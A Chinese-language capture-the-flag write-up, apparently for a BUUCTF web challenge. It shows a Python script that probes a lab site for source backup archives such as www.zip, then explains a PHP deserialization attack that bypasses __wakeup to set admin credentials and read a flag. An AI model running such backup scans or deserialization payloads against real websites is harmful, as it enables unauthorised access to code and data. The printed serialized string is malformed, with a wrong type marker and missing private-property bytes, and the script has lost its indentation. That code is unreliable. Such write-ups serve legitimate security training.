网页
提示了备份网站,这里用python的一个脚本发现网页存在www.zip
py代码
import requests
url1 = 'http://b46b86f5-0026-4a73-ac83-f9a48c4c7470.node4.buuoj.cn:81/' # url为被扫描地址,后不加‘/’
# 常见的网站源码备份文件名 同目录下创建List.txt 如web,website,backup,back,www,wwwroot,temp等
# with open('List1.txt', 'r') as f:
# list1 = f.read().splitlines()
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
# 常见的网站源码备份文件后缀
list2 = ['tar', 'tar.gz', 'zip', 'rar', '7-zip', '7z']
for i in list1:
for j in list2:
back = str(i) + '.' + str(j)
url = str(url1) + '/' + back
print(back + ' ', end='')
print(requests.get(url).status_code)
在网址后加/www.zip 下载文件包
查看flag.php
直接提交发现错误
再打开index.php
unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。
这里很可能考察反序列化,查看文件中包含的class.php文件。
直接看重点,我们想要输出flag,在这儿。它有个判断条件,是username绝对等于admin:
再往上看,发现password要弱等于100,不然的话就会在上面的判断里被die。
再往上看到,wakeup函数里会把我们的username赋值为guest。因为wakeup函数是在__destruct函数之前运行的,所以我们要绕过它。
经过分析,已经确定需要提交的参数是 select,而且提交的值是经过序列化之后的值,username=‘admin’,password=‘100’ 才能过。
# 序列化代码
<?php
class Name{
private $username = 'admin';
private $password = '100';
}
$ser = serialize(new Name());##序列化
var_dump($ser);##输出
?>
## 结果:"O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:3:'100';}"
var_dump() 函数用于输出变量的相关信息。
var_dump() 函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。
要绕过__wakeup只要让说明的参数个数大于实际的参数个数就行了。
得到flag